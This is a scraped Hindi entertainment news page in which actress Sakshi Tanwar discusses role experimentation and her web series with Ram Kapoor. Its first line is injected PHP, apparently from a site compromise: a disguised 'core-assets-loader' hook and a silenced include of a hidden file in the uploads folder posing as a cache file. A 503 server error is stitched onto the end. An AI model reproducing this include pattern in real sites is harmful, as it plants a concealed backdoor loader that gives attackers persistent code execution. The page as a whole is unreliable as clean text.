add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जितना कर सकती हूं उतना एक्सपेरिमेंट करना चाहूंगी – SOCH INDIA
Menu

मनोरंजन
जितना कर सकती हूं उतना एक्सपेरिमेंट करना चाहूंगी

nobanner

एक्ट्रेस साक्षी तंवर का कहना है कि उन्हें अलग अलग किरदार निभाना पसंद है और फिलहाल वह किरदारों के साथ एक्सपेरिमेंट करने की आजादी का खुलकर आनंद ले रही हैं. टीवी शो ‘कहानी घर-घर की’ से घर-घर में मशहूर हुईं साक्षी ने अपनी हालिया फिल्म ‘दंगल’ में ‘दया कौर’ के रूप में और टीवी सीरीज ’24 : सीजन-2′ में ‘शिबानी मलिक’ के रूप में वाहवाही बटोरी.

एक्ट्रेस अब वेब सीरीज ‘कर ले तू भी मोहब्बत’ के जरिए डिजिटल दुनिया में आगाज करने जा रही हैं. यह एकता कपूर के आगामी डिजिटल एप ‘एएलटी बालाजी’ पर दिखाया जाएगा. इस सीरीज में राम कपूर भी साक्षी के अपोजिट नजर आने वाले हैं.

साक्षी ने कहा, “मैं अब जिंदगी के उस मोड़ पर हूं जहां मैं खुद को मिलने वाले किरदारों के साथ जितना एक्सपेरिमेंट कर सकूं, उतना करना चाहती हूं. ” उन्होंने कहा, “शो ’24 : सीजन-2′ में ‘शिबानी मलिक’ के किरदार को निभाने में मुझे सबसे ज्यादा मजा आया क्योंकि इसने मुझे बतौर कलाकार एक शेड को दिखाने का मौका दिया. ’24’ जैसे शोज बन रहे हैं और अलग सब्जेक्ट पर ध्यान देने की कोशिश कर रहे हैं.”

साक्षी ने बताया कि ‘कर ले तू मोहब्बत’ को उन्होंने फिल्म ‘दंगल’ से पहले साइन किया था. साक्षी कहती हैं कि एक समय पर वह एक ही शो या फिल्म में काम करती हैं और हर शो के बाद कुछ समय के लिए रुकती जरूर हैं और अच्छे प्रोजेक्ट्स का इंतजार करती हैं.

‘कर ले तू मोहब्बत’ में वह राम कपूर के साथ नजर आएंगी. दोनों की जोड़ी को टीवी शो ‘बड़े अच्छे लगते हैं’ में दर्शकों ने पसंद किया था.

पर्दे पर दोनों की बेहतरीन केमिस्ट्री के बारे में राम ने कहा, “ईमानदारी से कहूं तो किसी भी जोड़ी के लिए दो चीजें जरूरी हैं चाहे वह शाहरुख-काजोल की जोड़ी हो या किसी और की… दोनों जो भी काम करें, बढ़िया करें और उन्हें एक-दूसरे के साथ सहज महसूस करना चाहिए.”

साक्षी ने बताया कि दोनों का स्वभाव एक-दूसरे के बिल्कुल अलग है, पसंद-नापसंद भी अलग है और शायद यही वजह है कि पर्दे पर दोनों की जोड़ी पसंद की जाती है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.